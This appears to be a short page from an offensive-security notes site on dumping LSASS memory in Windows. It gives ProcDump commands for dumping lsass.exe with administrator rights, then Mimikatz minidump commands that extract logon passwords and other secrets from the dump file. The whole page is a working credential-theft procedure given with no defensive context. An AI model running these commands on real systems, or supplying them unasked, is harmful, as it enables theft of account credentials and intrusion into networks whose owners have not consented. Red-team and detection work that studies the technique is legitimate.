search

LSASS DUMP

ProcDump - https://docs.microsoft.com/en-us/sysinternals/downloads/procdumparrow-up-right

Run procdump.exe with LOCAL ADMINISTRATOR PRIVILEGE to dump LSASS.exe process

.\procdump.exe -accepteula -ma lsass.exe lsass.dmp
.\procdump.exe -r -ma lsass.exe lsass.dmp

After copying the lsass.dmp dump file to local machin, use Mimikatz's minidump to extract secrets

sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords /all

PreviousMIMIKATZNextVOLUME SHADOW COPY

Last updated